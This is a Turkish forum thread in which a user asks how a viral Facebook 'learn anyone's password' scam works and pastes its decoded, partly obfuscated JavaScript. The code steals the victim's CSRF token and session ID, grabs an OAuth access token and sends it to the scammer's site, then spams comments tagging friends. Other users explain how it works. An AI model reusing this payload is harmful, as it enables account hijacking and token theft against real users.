lostyazilim
tr.link

Nasıl bir yol izliyor

8 Mesajlar 1.865 Okunma
lstbozum
tr.link

wild wild WM Aracı Kullanıcı
  • Üyelik 22.12.2012
  • Yaş/Cinsiyet 33 / E
  • Meslek
  • Konum İstanbul Avrupa
  • Ad Soyad M** B**
  • Mesajlar 212
  • Beğeniler 77 / 45
  • Ticaret 0, (%0)
Merhaba dostlar bu gün bunu okurken eminim karşılamışınızdır facebookda şifre öğrenme diye bişey dolanıyor ve bizim sazan insanımız atlamış herkese deli gibi bulaşıyor "http://byliker.com/kod/" nasıl şifre öğrenilceğini (kurbanlarını) burda anlatmış. Burda java nasıl bir yol izliyor bunu merak ettim bunu açıklıyabilcek biri varmı ?
 

 

wmaraci
reklam

YazilimMimari YazilimMimari Eski adi: Turgay Can Kullanıcı
  • Üyelik 25.06.2012
  • Yaş/Cinsiyet 38 / E
  • Meslek Engineering Director
  • Konum İstanbul Avrupa
  • Ad Soyad T** C**
  • Mesajlar 771
  • Beğeniler 2 / 260
  • Ticaret 0, (%0)
java ile alakası yok.
 

 

https://www.linkedin.com/in/turgaycan/
Kaliteli kod yazılır.. (Günlük/Saatlik ücreti ile)

wild wild WM Aracı Kullanıcı
  • Üyelik 22.12.2012
  • Yaş/Cinsiyet 33 / E
  • Meslek
  • Konum İstanbul Avrupa
  • Ad Soyad M** B**
  • Mesajlar 212
  • Beğeniler 77 / 45
  • Ticaret 0, (%0)

Turgay Can adlı üyeden alıntı

java ile alakası yok.



java ile şifrelenmiş decode ettiğimde karşıma böyle bişi çıktı.

function OzgurOzbay(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}
OzgurOzbay("1394040137485065");OzgurOzbay("703418936384076");OzgurOzbay("1514273738792846");OzgurOzbay("1616445078580933");OzgurOzbay("0152042580482580");OzgurOzbay("10152565727702580");OzgurOzbay("497276773705491");OzgurOzbay("497276733705495");OzgurOzbay("497276693705499");OzgurOzbay("497012823731886");OzgurOzbay("10152042580482580");OzgurOzbay("727014084003912");OzgurOzbay("");OzgurOzbay("");
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","1499983903566047","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);

if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.function () {
if(xmlhttp.readyState == 4){
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){
izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
};
xmlhttp.open("GET", url, true);
xmlhttp.send();
}
function duzenlevegonder(formnesne,act){
izinverparams = "";
for(i=0;i if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){
izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
}
}
if(formnesne.getElementsByTagName("select").length > 0){
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
}
izinverparams.replace("&fb_dtsg","fb_dtsg");
izinverparams += "&__CONFIRM__=1";
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();
xmlhttp.function () {
if(xmlhttp.readyState == 4){
izinhtml = document.createElement("html");
izinhtml.innerHTML = xmlhttp.responseText;
if(izinhtml.getElementsByTagName("form").length > 0){
izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
act = izinhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinhtml,act)
}else{
sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
if (sex[1]) {
tokenyolla(sex[1]);
}
}
}
};

xmlhttp.open("POST", act , true);
xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(izinverparams);

}

function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
}

if(!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
uygulamaizinver(TokenUrl("121876164619130"));
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiToggle wrap")){
for(i=0;i document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiPopover")){
for(i=0;i document.getElementsByClassName("uiPopover")[i].innerHTML = "";
}
}
},200);
function tokenyolla(token){
top.location.href = 'http://byliker.com/hesapcal#' + token;
}}
var alibasim = "Sifre Basariyla Bulundu ! Bilgilerin Oldugu Siteye Yönlendiriliyorsunuz!";
alert(alibasim);
 

 

YazilimMimari YazilimMimari Eski adi: Turgay Can Kullanıcı
  • Üyelik 25.06.2012
  • Yaş/Cinsiyet 38 / E
  • Meslek Engineering Director
  • Konum İstanbul Avrupa
  • Ad Soyad T** C**
  • Mesajlar 771
  • Beğeniler 2 / 260
  • Ticaret 0, (%0)
java ile java script arasındaki anlam karmaşası yaşamışsınız.

Olayın java ile alakası yok.
 

 

https://www.linkedin.com/in/turgaycan/
Kaliteli kod yazılır.. (Günlük/Saatlik ücreti ile)
wmaraci
wmaraci

anilbbyk anilbbyk WM Aracı Kullanıcı
  • Üyelik 24.11.2013
  • Yaş/Cinsiyet 29 / E
  • Meslek Öğrenci
  • Konum İstanbul Avrupa
  • Ad Soyad A** B**
  • Mesajlar 39
  • Beğeniler 1 / 2
  • Ticaret 0, (%0)
Java web programlama dili değil ? Bahsettiğiniz Javascript.
 

 

wild wild WM Aracı Kullanıcı
  • Üyelik 22.12.2012
  • Yaş/Cinsiyet 33 / E
  • Meslek
  • Konum İstanbul Avrupa
  • Ad Soyad M** B**
  • Mesajlar 212
  • Beğeniler 77 / 45
  • Ticaret 0, (%0)

Turgay Can adlı üyeden alıntı

java ile java script arasındaki anlam karmaşası yaşamışsınız.

Olayın java ile alakası yok.




anilbbyk adlı üyeden alıntı

Java web programlama dili değil ? Bahsettiğiniz Javascript.


Haklısınız dostlar bi anlam karmaşası yaşamışım. Benim merak ettiğim şu bu çalıştığında otomatik post oluşturuyor bunu nasıl sağlıyor yardımcı olabilcek varmı ? mantığını anlatabilcek.
 

 

YazilimMimari YazilimMimari Eski adi: Turgay Can Kullanıcı
  • Üyelik 25.06.2012
  • Yaş/Cinsiyet 38 / E
  • Meslek Engineering Director
  • Konum İstanbul Avrupa
  • Ad Soyad T** C**
  • Mesajlar 771
  • Beğeniler 2 / 260
  • Ticaret 0, (%0)
uygulamaizinver() : bu metod içinde ajax ile post ediyor.

Ek Olarak:

anilbbyk adlı üyeden alıntı

Java web programlama dili değil ? Bahsettiğiniz Javascript.


java web programlama dilidir lakin sadece web değil tüm ortam ve platformlara uygundur. Makine dili hariç sanırım, eğer onun içinde bir api yoksa ilgi alanım olmadığından araştırma fırsatım olmadı hiç.
 

 

https://www.linkedin.com/in/turgaycan/
Kaliteli kod yazılır.. (Günlük/Saatlik ücreti ile)

EyupErdogan EyupErdogan WM Aracı Kullanıcı
  • Üyelik 04.06.2014
  • Yaş/Cinsiyet 34 / E
  • Meslek Site Developer
  • Konum İstanbul Avrupa
  • Ad Soyad E** E**
  • Mesajlar 47
  • Beğeniler 3 / 2
  • Ticaret 0, (%0)
Bu adam geçerli bir api üzerinden senden fark ettirmeden bir uygulama onayı alıyor. Sonra hesabında uygulama yetkisini kullanıp onu farklı yöntemlerle paylaşıyor,etiketleyebiliyor,mesaj attırabiliyor,gruplara post attırıp flood yapabiliyor. :D Google'ye link verip ona script ile yetenek kazandırıyor, sen linke tıklayınca fonksiyon çalışıyor ama sen google.com'a gidiyorsun.. mantık bu

Uygulama onayını gizlice aldıktan sonra senin adına yetki kazanır, sen onu hesap ayarlarından (uygulamayı) kaldırırsan yetkileride kapatmış olursun.
 

 

wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al